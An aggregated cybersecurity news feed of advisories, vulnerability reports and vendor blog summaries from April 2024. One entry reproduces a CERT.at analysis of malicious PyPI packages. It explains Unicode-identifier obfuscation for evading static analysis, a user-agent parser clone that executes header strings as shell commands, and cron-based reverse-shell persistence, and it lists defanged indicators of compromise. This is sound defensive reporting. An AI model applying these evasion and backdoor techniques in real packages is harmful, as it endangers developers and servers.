This week, we talk about the critical vulnerability discovered in Palo Alto network devices and the yellow alert issued about it. Other topics this week include phishing messages sent out in the Positive credit register’s name and invoice fraud attempts targeting various organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-162024
OFFIS DCMTK DVPSSoftcopyVOI_PList::createFromImage incorrect type conversion vulnerability
2024-04-23T00:00:00Z | 1713830400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1957
Decrypting Fortinet's FortiOS 7.0.x
2024-04-23T00:00:00Z | 1713830400

Curious about decrypting Fortinet's FortiOS 7.0.x firmware? In the latest Grimoire post, we delve into the technical details of doing just that, revealing a hardcoded key used in the ChaCha20 encryption algorithm and the steps required to extract the decrypted rootfs.gz file.

https://www.greynoise.io/blog/decrypting-fortinets-fortios-7-0-x
Double Agents and User Agents: Navigating the Realm of Malicious Python Packages
2024-04-22T14:12:10Z | 1713795130

Have you ever encountered the term 'double agent'? Recently, we've had the opportunity to revisit this concept in Austria. Setting aside real-world affairs for prosecutors and journalists, let’s explore what this term means in the digital world as I continue my journey tracking malicious Python packages. Open Source is a key! Suppose you were a script kiddie threat actor researcher looking to snag some cookies analyse new tools used to steal information from victims — where would you head? You might choose from several options, but let’s assume you love open source and decide to visit GitHub, one of the largest platforms for open source projects. It’s an excellent resource for almost everything IT-related, including educational materials on malware builders. I tricked you a bit there — did you catch it? Not everything on GitHub is open source, even if the source code is visible. Moreover, “open source” doesn't mean the same thing in every context. It’s crucial to always check the licence. Always check the licence. For instance, on GitHub, you can find the Oak Token Grabber V2. It offers a builder to customize a grabber (information stealer malware). Check out these features: A screenshot of the README from the repository dreamyoak/Oak-Grabber-V2 This repository isn’t new; it existed already in the middle of last year [1]. When I visited, there was a link to a website offering paid versions of educational RAT grabbers and other services. This isn't unusual. Reviewing the repository's history showed no activity for a year between March 2023 and March 2024, then suddenly, an author with a slightly different name (dreamyoak instead of the original dynastyoak) began updating the code. This suggests that the repository had been moved or perhaps taken down in the past year. A brief note on analysing the history of git repositories: like anything, you cannot blindly trust the data provided by git. For instance, dates can be easily tampered with by the commit author. However, in this case, all changes were made through the GitHub web interface, which means such commits are automatically signed by GitHub, and we can verify them using their public key [2]. What did the new author do? The most significant change was the introduction of a new dependency that did quite a bit: collecting Wi-Fi passwords, PowerShell history, installed applications, desktop screenshots, and more. Yet, there was one tiny detail. These weren't features of the builder. This data was collected from people trying to build malware, effectively acting as a double agent spying on both sides. In short, a grabber builder was transformed into a grabber itself. The dependency — a Python package uploaded to PyPI — was imported by the builder when used, then it automatically downloaded an actual grabber that collected and exfiltrated data. This was, in fact, the grabber advertised on the website — the Nagogy Grabber — first observed at least a year ago [3]. It can be easily detected with a YARA rule from Any.run [4]. While the malicious dependency straightforwardly downloaded and ran the actual grabber, a very clever old technique was used to evade static analysers. Python is one of the languages that does not require source code to be written using pure ASCII characters. PEP 3131 introduced support for any characters that can be normalized and defined Python behaviour as follows: “All identifiers are converted into the normal form NFKC while parsing; comparison of identifiers is based on NFKC.” [5] What does this mean? Consider the example below. In the first two lines, I used simple 'u' and 'a' letters. But the characters in the third line aren’t them any more—those are “Mathematical Sans-Serif Bold Italic Small U” [6] and “Mathematical Sans-Serif Bold Small A.” [7] Both are part of the Unicode specification, and as you can see, even though they don’t graphically match the variable identifiers from previous lines, Python was able to process the statement successfully. This was possible thanks to the normalization, which translated the characters to ASCII before evaluation. An example of mixing ASCII and Unicode characters in identifiers that could confuse people but not Python This feature isn't often used, but authors of malicious code learned years ago that many static analysers do not follow PEP 3131 and won’t recognize what the code in the picture below, sampled from the malicious package imported by the mentioned grabber builder, really does. This is an entirely valid Python code downloading and running a malicious executable The author of the Oak-Grabber-V2 seemed quite determined to maintain the double agent feature. After removing malicious packages from PyPI, they were quickly introduced new ones and updated the repository. Observing the stars and forks statistics captured by archive.org, the repository doubled its popularity in just a few days between February 27 and March 7 [8] [9]. It appears the author promoted the tool aggressively and later tried to extract data from its users — the 'double agent' feature was introduced on April 11. This cat-and-mouse game finished when GitHub removed the repository on April 16. Comparison of the repository statistics on February 27 [8] and March 7 [9] User agent control It wasn’t just one 'agent' found recently. I came across another Python package that offered a unique functionality — controlling your server via the User-Agent header! A sample from the user-agents-parser package This innovative feature was embedded within a clone of a popular package designed to parse user-agent strings [10], which are self-descriptions browsers send to servers with every request [11]. Web applications often use these strings for different purposes, like directing users to a mobile site or gathering statistics. In this instance, the author replicated an existing package but added a twist: the strings could execute as shell commands before being parsed. Despite the modification, the packages maintained their original functionality, meaning you wouldn't know you were using a compromised package unless a specific request triggered the command execution. Moreover, the package creator employed another common tactic worth noting: they preserved the original project's website and author information, which are typically displayed on package index pages like PyPI. These stats can mislead users into trusting a seemingly popular and secure package. PyPI recently took steps to prevent such deception by clearly indicating which data are verified and which are not — a significant improvement. Left – a screen from a repository captured in archive.org [12], right – another repository, state as of today [10]. After I reported the package, Mike Fiedler from PyPI security team found that its earlier version was also trying to establish a persistent reverse shell by registering a cron job. An earlier version of user-agents-parser was trying to use crontab for persistence Final thoughts All associated packages were removed from the PyPI, and the Oak-Grabber-V2 repository was shut down by GitHub. However, this isn't the first or last time we'll encounter such threats. If you're looking for advice, I've noted some tips in my last post. But most importantly, avoid downloading random software, even if it's for educational purposes. IoCs Malicious packages used by Oak-Grabber-V2: argsreq, colarg, colargs, reqarg, reqargs URLs with the actual grabber: hxxps://api.dreamyoak[.]xyz/cdn/file hxxps://api2.dreamyoak[.]xyz/cdn/file Malicious packages pretending to be user agent parser: user-agents-parser, user-agents-parsers IP used in an attempt for reverse shell: 95.179[.]177[.]74 References [1] https: //web.archive.org/web/20230731214919/https://github.com/dreamyoak/[2] https://github.com/web-flow.gpg[3] https://twitter.com/MalGamy12/status/1698367753919357255[4] https://github.com/anyrun/YARA/blob/73fba11a040629e147281aa0528439d72fb5402a/NagogyGrabber.yar[5] https://peps.python.org/pep-3131/[6] https://unicodeplus.com/U+1D66A [7] https://unicodeplus.com/U+1D5EE[8] https: //web.archive.org/web/20240227221457/https://github.com/c/Oak-Grabber-V2?tab=readme-ov-file[9] https: //web.archive.org/web/20240307140321/https://github.com/dreamyoak/Oak-Grabber-V2[10] The original, safe package is here: https://pypi.org/project/user-agents/[11] https://developer.mozilla.org/en-US/docs/Glossary/User_agent[12] https://web.archive.org/web/20240117161520/https://pypi.org/project/adafruit-circuitpython-htu31d/

https://www.cert.at/en/blog/2024/4/double-agents-and-user-agents-navigating-the-realm-of-malicious-python-packages
Keep Your Tech Flame Alive: Trailblazer Samantha Lee
2024-04-22T13:00:00Z | 1713790800

https://www.akamai.com/blog/culture/2024/apr/keep-your-tech-flame-alive-trailblazer-samantha-lee
Data breaches to Palo Alto GlobalProtect products – requires immediate action
2024-04-22T11:23:44Z | 1713785024

A vulnerability (CVE-2024-3400) in a Palo Alto GlobalProtect product that is widely used in organisations is being actively exploited. The vulnerability has significant effects and requires updating and investigating the devices. Devices susceptible to the vulnerability should be suspected of being breached.

https://www.kyberturvallisuuskeskus.fi/en/data-breaches-palo-alto-globalprotect-products-requires-immediate-action
CVE-2024-3400: Critical Palo Alto PAN-OS Command Injection Vulnerability Exploited by Sysrv Botnet’s XMRig Malware
2024-04-21T16:31:03Z | 1713717063

On Friday, April 12, 2024, Palo Alto Networks PAN-OS was found to have an OS command injection vulnerability (CVE-2024-3400). Due to its severity, CISA added it to its Known Exploited Vulnerabilities Catalog. Shortly after disclosure, a PoC was published. We have identified several attempts to exploit this vulnerability with the intent to install XMRig malware... The post CVE-2024-3400: Critical Palo Alto PAN-OS Command Injection Vulnerability Exploited by Sysrv Botnet’s XMRig Malware appeared first on Cato Networks.

https://www.catonetworks.com/blog/cve-2024-3400-critical-palo-alto-pan-os-command-injection-vulnerability/
ELi regulaatorasutuste ekspertrühm kohtus Tallinnas
2024-04-19T13:11:02Z | 1713532262

16. ja 17. aprillil toimus Tallinnas Euroopa Liidu 23 liikmesriigi regulaatorasutuste esindajate FESA/ECATS ekspertrühma töökohtumine, mille korraldas Riigi Infosüsteemi Amet.

https://ria.ee/uudised/eli-regulaatorasutuste-ekspertruhm-kohtus-tallinnas
The 8 Most Common Causes of Data Breaches
2024-04-19T13:00:00Z | 1713531600

https://www.akamai.com/blog/security/2024/apr/8-most-common-causes-of-data-breaches
DigiDoc4 kliendis digiallkirjastamisel ilmnenud tõrked said lahendatud
2024-04-19T11:10:41Z | 1713525041

RIA avaldas 18. aprillil uue ID-tarkvara versiooni 24.4, millega said lahenduse digiallkirjastamisega tekkinud tõrked. Selleks, et DigiDoc4 kliendis digiallkirjastamine töötaks ootuspäraselt, tuleb kasutajatel oma ID-tarkvara uuendada värskeimale versioonile.

https://ria.ee/uudised/digidoc4-kliendis-digiallkirjastamisel-ilmnenud-torked-said-lahendatud
The National Cyber Security Centre Finland’s weekly review – 15/2024
2024-04-19T08:00:43Z | 1713513643

This week, we talk about the information security of internet-connected home devices and vulnerabilities that can expose such devices, especially televisions, to cyber attacks and also provide information on how to protect home devices. Other topics in this week’s review include the recording of the Tietourva 2024 information security seminar held in March, the NIS2 Directive and the feedback questionnaire on our website.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-152024
The National Cyber Security Centre Finland’s weekly review – 15/2024
2024-04-19T08:00:43Z | 1713513643

This week, we talk about the information security of internet-connected home devices and vulnerabilities that can expose such devices, especially televisions, to cyber attacks and also provide information on how to protect home devices. Other topics in this week’s review include the recording of the Tietourva 2024 information security seminar held in March, the NIS2 Directive and the feedback questionnaire on our website.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-152024
Security Alert (A24-04-16): Multiple Vulnerabilities in Microsoft Edge
2024-04-19T04:00:00Z | 1713499200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
GreyNoise Tags Its Way to 1337 Elite Status
2024-04-19T00:00:00Z | 1713484800

GreyNoise celebrates reaching its 1,337th tag, attributing its success to the practical use of AI, particularly the creation of Sift. This has led to increased tag creation and expanded coverage of vulnerabilities.

https://www.greynoise.io/blog/greynoise-tags-its-way-to-1337-elite-status
Data Matters ? The Value of Visibility in API Security
2024-04-18T13:00:00Z | 1713445200

https://www.akamai.com/blog/security/2024/apr/the-value-of-visibility-in-api-security
Securing Office 365 with better configuration
2024-04-18T11:37:45Z | 1713440265

How our Office 365 advisory and new security guidance from Microsoft can help protect your cloud services.

https://www.ncsc.gov.uk/blog-post/securing-office-365-with-better-configuration
Exclusive Networks: New OT Security Agreement with Radiflow in Italy
2024-04-18T09:19:54Z | 1713431994

Exclusive Networks, a global cybersecurity specialist for trusted digital infrastructure, announces a new distribution agreement with Radiflow, a global leader in Operations Technology (OT) cybersecurity and risk management solutions. Radiflow’s solutions are designed to defend critical networks in industrial and manufacturing settings. Its solutions protect more than 8,000 critical facilities worldwide. The digital transformation is […] The post Exclusive Networks: New OT Security Agreement with Radiflow in Italy appeared first on Radiflow.

https://www.radiflow.com/news/exclusive-networks-new-ot-security-agreement-with-radiflow-in-italy/
Security Alert (A24-04-15): Multiple Vulnerabilities in Cisco Products
2024-04-18T04:00:00Z | 1713412800

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Silicon Labs Gecko Platform HTTP server header parsing invalid pointer dereference vulnerability
2024-04-18T00:00:00Z | 1713398400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1945
Tehnopoli ja RIA küberkiirendis startis kaheksa iduettevõtet
2024-04-17T12:20:22Z | 1713356422

Tehnopol Startup Inkubaator korraldab koos Riigi Infosüsteemi Ameti (RIA) ja Euroopa küberpädevuskeskusega (ECCC) küberkiirendit, mis aitab kübervaldkonna iduettevõtetel oma tooteid või teenuseid arendada. Kiirendi teine voor alustas oma teekonda 16. aprillil.

https://ria.ee/uudised/tehnopoli-ja-ria-kuberkiirendis-startis-kaheksa-iduettevotet
Watch all the plenaries from CYBERUK 2024 live, and for free
2024-04-17T09:59:32Z | 1713347972

Key talks from the UK government’s flagship cyber security event will be livestreamed from Birmingham’s ICC.

https://www.ncsc.gov.uk/blog-post/watch-cyberuk2024-plenaries
RIA avaldas ID-tarkvara uue versiooni
2024-04-17T06:09:04Z | 1713334144

Riigi Infosüsteemi Amet avaldas 15. aprillil ID-tarkvara uue versiooni (2024.4), et tagada süsteemide toimimine ja täiendada turvafunktsioone. Soovitame kõigil kasutajatel uuendada ID-tarkvara uusimale versioonile, mille saab alla laadida veebilehelt id.ee.

https://ria.ee/uudised/ria-avaldas-id-tarkvara-uue-versiooni
The National Cyber Security Centre Finland’s weekly review – 14/2024
2024-04-17T05:46:23Z | 1713332783

This week, we talk about a critical vulnerability affecting Linux operating systems and our recently published information package on deepfakes, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-142024
The National Cyber Security Centre Finland’s weekly review – 14/2024
2024-04-17T05:46:23Z | 1713332783

This week, we talk about a critical vulnerability affecting Linux operating systems and our recently published information package on deepfakes, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-142024
Cyber weather for March 2024
2024-04-17T05:14:15Z | 1713330855

Cyber weather in March was tinged with rain, but we got some rays of sunshine as well. Especially vehicle tax themed phishing was present in scams. We also saw denial-of-service attacks and email phishing in March. In Automation and IoT, the sun was shining with the advances in international cybersecurity labels.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2024
Cyber weather for March 2024
2024-04-17T05:14:15Z | 1713330855

Cyber weather in March was tinged with rain, but we got some rays of sunshine as well. Especially vehicle tax themed phishing was present in scams. We also saw denial-of-service attacks and email phishing in March. In Automation and IoT, the sun was shining with the advances in international cybersecurity labels.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2024
High Threat Security Alert (A24-04-12): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2024)
2024-04-17T04:00:00Z | 1713326400

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-13): Multiple Vulnerabilities in Google Chrome
2024-04-17T04:00:00Z | 1713326400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-14): Multiple Vulnerabilities in Firefox
2024-04-17T04:00:00Z | 1713326400

Mozilla has published the advisories (MFSA2024-18 and MFSA2024-19) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Peplink Smart Reader web interface /cgi-bin/download_config.cgi information disclosure vulnerability
2024-04-17T00:00:00Z | 1713312000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1865
Peplink Smart Reader web interface /cgi-bin/debug_dump.cgi information disclosure vulnerability
2024-04-17T00:00:00Z | 1713312000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1863
Peplink Smart Reader web interface /cgi-bin/upload_config.cgi data integrity vulnerability
2024-04-17T00:00:00Z | 1713312000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1866
Peplink Smart Reader /bin/login privilege escalation vulnerability
2024-04-17T00:00:00Z | 1713312000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1868
Peplink Smart Reader web interface mac2name OS command injection vulnerability
2024-04-17T00:00:00Z | 1713312000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1867
Security Advisory - Vulnerability of Improper Interface Access Control in a Huawei PC Product
2024-04-17T00:00:00Z | 1713312000

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-voiiaciahpp-6376e0c7-en
Security Advisory - Improper Handling of Length Parameter Inconsistency in a Huawei PC Product
2024-04-17T00:00:00Z | 1713312000

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-iholpiiahpp-0ab7d6db-en
Security Advisory - Huawei PC Product Vulnerable to Improper Check for Unusual or Exceptional Conditions
2024-04-17T00:00:00Z | 1713312000

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-hppvticfuoec-8ffde288-en
Security Advisory - Inappropriate Interface access Control Vulnerability in a Huawei PC Product
2024-04-17T00:00:00Z | 1713312000

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-iiacviahpp-71ce77ee-en
Security Advisory - Huawei PC Product Vulnerable to Improper Restriction of Operations within the Bounds of a Memory Buffer
2024-04-17T00:00:00Z | 1713312000

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-hppvtiroowtboamb-bb3261bd-en
Security Advisory - Memory Overflow Vulnerability in Some Huawei Smart Speakers
2024-04-17T00:00:00Z | 1713312000

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-samovishss-28e21e39-en
CVE-2024-3746
2024-04-16T12:59:00Z | 1713272340

CWE-284 IMPROPER ACCESS CONTROL: The entire parent directory - C:\ScadaPro and its sub-directories and files are configured by default to allow users, including unprivileged users, to write or overwrite files. Measuresoft recommends that users manually reconfigure the vulnerable directories so that they are not writable by everyone.

https://claroty.com/team82/disclosure-dashboard/cve-2024-3746
5 reasons to strive for better disclosure processes
2024-04-15T13:00:53Z | 1713186053

This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes. Here are the five bugs: Undefined behavior in the borsh-rs Rust library Denial-of-service […]

https://blog.trailofbits.com/2024/04/15/5-reasons-to-strive-for-better-disclosure-processes/
Empowering Change: Using Your Influence to Confront the Climate Crisis
2024-04-15T13:00:00Z | 1713186000

https://www.akamai.com/blog/sustainability/2024/apr/using-your-influence-to-confront-the-climate-crisis
Artificial intelligence is an increasingly central factor in future cybersecurity solutions
2024-04-15T06:19:09Z | 1713161949

There is a lot of discussion about AI and its utilization in promoting cybersecurity. Already today, different industries are using different AI-based cybersecurity solutions. Where are we currently in the development and use of solutions? What kind of developments can be seen in the future? In general, what are the possibilities of AI in improving cybersecurity?

https://www.kyberturvallisuuskeskus.fi/en/news/artificial-intelligence-increasingly-central-factor-future-cybersecurity-solutions
Artificial intelligence is an increasingly central factor in future cybersecurity solutions
2024-04-15T06:19:09Z | 1713161949

There is a lot of discussion about AI and its utilization in promoting cybersecurity. Already today, different industries are using different AI-based cybersecurity solutions. Where are we currently in the development and use of solutions? What kind of developments can be seen in the future? In general, what are the possibilities of AI in improving cybersecurity?

https://www.kyberturvallisuuskeskus.fi/en/news/artificial-intelligence-increasingly-central-factor-future-cybersecurity-solutions
High Threat Security Alert (A24-04-10): Multiple Vulnerabilities in Palo Alto Products
2024-04-15T04:00:00Z | 1713153600

Palo Alto has published security advisories to address multiple vulnerabilities in PAN-OS and Prisma Access.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-11): Multiple Vulnerabilities in Microsoft Edge
2024-04-15T04:00:00Z | 1713153600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS
2024-04-15T00:00:00Z | 1713139200

On April 12th, 2024, Palo Alto Networks disclosed CVE-2024-3400, a critical command injection vulnerability in PAN-OS software versions 10.2, 11.0, and 11.1, allowing unauthenticated attackers to run arbitrary code with root privileges on affected firewalls when GlobalProtect gateway and device telemetry are active.

https://www.greynoise.io/blog/cve-2024-3400-command-injection-vulnerability-palo-alto-networks-pan-os
CreateRCE ? Yet Another Vulnerability in CreateUri
2024-04-12T14:00:00Z | 1712930400

https://www.akamai.com/blog/security-research/2024/apr/critical-vulnerability-create-uri-remote-code-execution
API Cyberattacks: A Growing Threat for Organizations in Latin America
2024-04-12T13:00:00Z | 1712926800

Learn about the growing threat of API cyberattacks and their effect on industries across Latin America.

https://www.akamai.com/blog/security/2024/apr/api-cyberattacks-growing-threat-organizations-latin-america
Akamai?s Perspective on April?s Patch Tuesday 2024
2024-04-12T06:00:00Z | 1712901600

https://www.akamai.com/blog/security-research/2024/apr/akamai-perspective-patch-tuesday-april-2024
Gemini: O que é e como manter a segurança em 2024?
2024-04-12T04:12:38Z | 1712895158

https://nsfocusglobal.com/web-stories/gemini-como-manter-a-seguranca-em-2024/
Women in Tech: A Conversation with Cato’s Shay Rubio
2024-04-11T13:22:51Z | 1712841771

For International Women’s Day (March 8, 2024), the German language, software news site, entwickler.de, interviewed Cato product manager Shay Rubio about her journey in high tech. Here’s an English translation of that interview: When did you become interested in technology and what first got you interested in tech? I’m a curious person by nature and... The post Women in Tech: A Conversation with Cato’s Shay Rubio appeared first on Cato Networks.

https://www.catonetworks.com/blog/women-in-tech-a-conversation-with-catos-shay-rubio/
How to Dramatically Simplify PCI DSS Compliance
2024-04-11T13:00:00Z | 1712840400

https://www.akamai.com/blog/security/2024/apr/dramatically-simplify-pci-dss-compliance
Security Alert (A24-04-09): Multiple Vulnerabilities in Google Chrome
2024-04-11T04:00:00Z | 1712808000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CNCS publica Referencial de Comunicação de Risco e Crise em Cibersegurança
2024-04-11T00:00:00Z | 1712793600

O Centro Nacional de Cibersegurança (CNCS) disponibiliza um Referencial de Comunicação de Risco e Crise em Cibersegurança (Referencial), com o objetivo de ajudar as organizações nacionais a comunicar em contextos de risco e crise de cibersegurança. O CNCS identificou que muitas organizações que sofrem incidentes de cibersegurança não sabem como comunicar com as suas partes interessadas, nomeadamente autoridades, clientes, fornecedores, colaboradores internos e media, entre outros. Esta comunicação pode ser fundamental para responder aos incidentes de forma adequada, bem como para gerir a reputação da organização e a confiança da sociedade. Ser um suporte à comunicação das organizações na gestão do risco e resposta a incidentes de cibersegurança, ao contribuir para a elaboração de planos de comunicação a seguir em situações de crise é um dos objetivos do documento. A enumeração dos passos a seguir e a identificação de elementos e funções essenciais na equipa de comunicação formada para estas situações são alguns dos contributos do documento, que visa promover o contínuo aperfeiçoamento dos planos de comunicação das organizações. O Referencial disponibilizado pelo CNCS não deve ser entendido como um normativo, mas sim como uma referência de partida para a definição de estratégias, políticas e planos, que devem ser adaptados às características e necessidades de cada organização. O Referencial divide-se em três fases: 1) preparar a comunicação: preparação e elaboração de um plano de comunicação, que inclui os passos necessários, um levantamento dos riscos e a seleção das partes interessadas relevantes; 2) responder à crise: aspetos práticos e de execução da comunicação em contexto de crise, como a ativação da equipa de comunicação, as necessidades de reporte da crise e de notificação ao CNCS, entre outros aspetos; 3) pontos a melhorar: promoção da melhoria contínua através de uma análise retrospetiva da situação ocorrida para melhorar a resposta futura. O Referencial de Comunicação de Risco e Crise em Cibersegurança destina-se a todas as organizações, com particular relevância para as que possuem menos competências internas na área de comunicação em cibersegurança. Consultar o documento completo Versão de consulta rápida Vídeo promocional  

https://dyn.cncs.gov.pt/pt/detalhe/art/135857/cncs-publica-referencial-de-comunicacao-de-risco-e-crise-em-ciberseguranca
Five Things Every SOC Should Know About Today’s Hybrid Cyber Attackers by Jesse Kimbrel
2024-04-11T00:00:00Z | 1712793600

Today’s hybrid attackers expose security gaps, compromise identities and use a variety of tactics to hide and progress inside enterprise environments.

https://www.vectra.ai/blog/five-things-every-soc-should-know-about-todays-hybrid-cyber-attackers
DDoS and DNS: where can the DNS platform protect your assets
2024-04-10T14:10:57Z | 1712758257

DNS, unfortunately, is a prime target for DDoS attacks, a fact that cannot be ignored. This vulnerability poses a significant risk to the stability and accessibility of your online services. Some servers and some setups allow the bad guys to use DNS servers to attack other servers. Other setups and servers are not configured or […]

https://secure64.com/2024/04/10/8290/
The Cato Socket Gets LTE: The Answer for Instant Sites and Instant Backup
2024-04-10T13:08:24Z | 1712754504

Every year, Bonnaroo, the popular music and arts festival, takes over a 700-acre farm in the southern U.S. for four days. While the festival is known for its diverse lineup of music, it also offers a unique and immersive festival experience filled with art, comedy, cinema, and more. For the networking nerds among us, though,... The post The Cato Socket Gets LTE: The Answer for Instant Sites and Instant Backup appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-cato-socket-gets-lte-the-answer-for-instant-sites-and-instant-backup/
Comparing the Benefits of Microsegmentation vs. VLANs
2024-04-10T13:00:00Z | 1712754000

https://www.akamai.com/blog/security/2024/apr/comparing-the-benefits-of-microsegmentation-versus-vlans
High Threat Security Alert (A24-04-07): Multiple Vulnerabilities in Microsoft Products (April 2024)
2024-04-10T04:00:00Z | 1712721600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-08): Multiple Vulnerabilities in Fortinet Products
2024-04-10T04:00:00Z | 1712721600

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
AMD Radeon DirectX 11 Driver atidxx64.dll Shader Functionality arbitrary write vulnerability
2024-04-10T00:00:00Z | 1712707200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1847
AMD Radeon DirectX 11 Driver atidxx64.dll Shader Functionality arbitrary write vulnerability
2024-04-10T00:00:00Z | 1712707200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1848
How to Protect Against a Supply Chain Compromise: Takeaways From the XZ Utils Backdoor by John Mancini
2024-04-10T00:00:00Z | 1712707200

Learn more about the XZ Utils backdoor vulnerability and how to find out if your organization has been exposed.

https://www.vectra.ai/blog/takeaways-from-the-xz-utils-backdoor
Shield NS53 Protects Your Origin DNS Infrastructure from NXDOMAIN Attacks
2024-04-09T10:00:00Z | 1712656800

https://www.akamai.com/blog/security/2024/apr/shield-ns53-protects-from-nxdomain-attacks
Märtsikuu küberruumis: suuremad küberründed ja olulisemad teenusekatkestused
2024-04-09T06:16:08Z | 1712643368

Riigi Infosüsteemi Ameti (RIA) kuukokkuvõttest selgub muu hulgas, et märtsis korraldati Eesti avaliku sektori veebilehtede vastu rekordilise mahuga ummistusrünne, kasvasid pettused ja pahaloomulised ümbersuunamised ning tehniliste tõrgete tõttu oli häiritud riiklike autentimisteenuste ja portaali eesti.ee töö.

https://ria.ee/uudised/martsikuu-kuberruumis-suuremad-kuberrunded-ja-olulisemad-teenusekatkestused
Noname Security Platform Updates: 3.29 Release
2024-04-09T02:07:00Z | 1712628420

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-329-release
BatBadBut: You can't securely execute commands on Windows
2024-04-09T00:00:00Z | 1712620800

Introduction Hello, I’m RyotaK ( @ryotkak ), a security engineer at Flatt Security Inc. Recently, I reported multiple vulnerabilities to several programming languages that allowed an attacker to perform command injection on Windows when the specific conditions were satisfied. Today, affected vendors published advisories of these vulnerabilities , so I’m documenting the details here to provide more information about the vulnerabilities and minimize the confusion regarding the high CVSS score. TL;DR The BatBadBut is a vulnerability that allows an attacker to perform command injection on Windows applications that indirectly depend on the CreateProcess function when the specific conditions are satisfied.

https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/
Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) web interface memory corruption vulnerability
2024-04-09T00:00:00Z | 1712620800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1864
Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) TDDP denial of service vulnerability
2024-04-09T00:00:00Z | 1712620800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1861
tddpd enable_test_mode command execution vulnerability
2024-04-09T00:00:00Z | 1712620800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1862
Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) web interface Radio Scheduling stack-based buffer overflow vulnerability
2024-04-09T00:00:00Z | 1712620800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888
Five Ways the Best SOCs Stay Ahead of the Threat Detection Curve by Zoey Chu
2024-04-09T00:00:00Z | 1712620800

Top security teams key in on these five areas to effectively prioritize urgent threats.

https://www.vectra.ai/blog/five-ways-the-best-socs-stay-ahead-of-the-threat-detection-curve
Leveraging AI Advances to Improve Intelligence for Discovery, Identification, and Interpretation
2024-04-09T00:00:00Z | 1712620800

In this post, you'll discover how GreyNoise is reshaping cybersecurity using AI, with initiatives for anomaly discovery and targeted attack identification. Also, get up to speed on our new plug-in for Microsoft Copilot for Security.

https://www.greynoise.io/blog/artificial-intelligence-real-intel-how-greynoise-is-leveraging-ai-advances-to-improve-intelligence-for-discovery-identification-and-interpretation
Why Payers Are Pivotal to API Security Across the Healthcare Ecosystem
2024-04-08T13:00:00Z | 1712581200

https://www.akamai.com/blog/security-research/payers-are-pivotal-to-api-security-across-healthcare
CVE-2024-3273: D-Link NAS RCE Exploited in the Wild
2024-04-08T00:00:00Z | 1712534400

Stay informed about a critical remote code execution vulnerability affecting D-Link NAS devices. It is being tracked under CVE-2024-3273 and believed to affect as many as 92,000 devices.

https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
Systems Manager Scores Nod of Approval
2024-04-05T15:00:00Z | 1712329200

Device management magic from Meraki earns Android Silver Partner status The post Systems Manager Scores Nod of Approval appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/04/systems-manager-scores-nod-of-approval/
Security Alert (A24-04-03): Multiple Vulnerabilities in Apache HTTP Server
2024-04-05T04:00:00Z | 1712289600

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-04): Multiple Vulnerabilities in Ivanti Products
2024-04-05T04:00:00Z | 1712289600

Ivanti has released a security advisory to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
